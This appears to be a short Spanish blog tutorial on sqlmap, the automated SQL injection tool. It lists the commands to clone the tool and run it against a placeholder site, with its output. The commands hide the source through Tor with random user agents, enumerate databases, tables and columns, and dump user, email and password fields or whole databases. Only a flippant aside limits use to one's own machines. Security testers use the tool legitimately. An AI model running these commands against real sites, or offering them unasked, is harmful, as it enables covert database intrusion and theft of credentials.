Vistazo rápido y funcional a SQLmap

Las patatas no llegaron a estas partes hasta después de 1492. En los barcos llevaron gripes GET y ratas POST. Y destrozaron toda una civilización indígena mágica. Las aplicaciones web van con bodegas y agujeritos. Todo tiende a la apertura. Cosas de la religión.

SQLMap provee automatismos para testear la seguridad entre una aplicación web y la base de datos con la que interactúa.
Un cliente SQL remoto no autorizado. Para usar sobre máquinas no ajenas de día.

Clonar repositorio git:

git clone git://github.com/sqlmapproject/sqlmap.git

Entrando:

cd sqlmap

Modo de uso de primeras:

python sqlmap.py -u "http://nopuedoconlafiebre.org/?s=prueba"

Primer aperitivo:

python sqlmap.py --random-agent --dbms=mysql --thread=10 --time-sec=3 --tor --tor-type=SOCKS5 --check-tor -u "http://nopuedoconlafiebre.org/index.php?id=1"  --dbs

donde:

– -random-agent = utilizar encabezado HTTP User-Agent seleccionados al azar

– -dbms = define el tipo de bbdd: mysql, mssql, etc

– -threads = Número máximo de peticiones http concurrente(s) (por defecto 1)

– -time-sec = Segundos para retrasar la respuesta de DBMS (por defecto 5)

– -tor – -tor-type=SOCKS5 – – check-tor = hace las peticiones a través de tor

-u = target a escanear

Tras eso…

– -dbs Muestra todas las bbdd

back-end DBMS: MySQL >= 5.0.0
available databases [5]:
[*] information_schema
[*] phpmyadmin
[*] Prueba
[*] test
[*] user

-D BASEDEDATOS – -table muestra las tablas que hay en esa base de datos

Database: phpmyadmin
[8 tables]
+---------------------+
| pma_bookmark        |
| pma_column_info     |
| pma_designer_coords |
| pma_history         |
| pma_pdf_pages       |
| pma_relation        |
| pma_table_coords    |
| pma_table_info      |
+---------------------+

-D BASEDEDATOS -T USARIOS – -columns muestra las columnas que hay en esa tabla de usuarios

Database: phpmyadmin
Table: pma_column_info 
[2 columns]
+--------+----------+
| Column | Type     |
+--------+----------+
| id     | int(11)  |
| name   | char(64) |
+--------+----------+

-D BASEDEDATOS -T USUARIOS -C usuario,email,clave – -dump para descargar esos tres campos que se le está pidiendo.

¿Qué quieres bajar la bbdd entera? –dump-all

\o/

Compartir

2 Comentarios

Deja una respuesta

Your email address will not be published. Required fields are marked *

To create code blocks or other preformatted text, indent by four spaces:

    This will be displayed in a monospaced font. The first four 
    spaces will be stripped off, but all other whitespace
    will be preserved.
    
    Markdown is turned off in code blocks:
     [This is not a link](http://example.com)

To create not a block, but an inline code span, use backticks:

Here is some inline `code`.

For more help see http://daringfireball.net/projects/markdown/syntax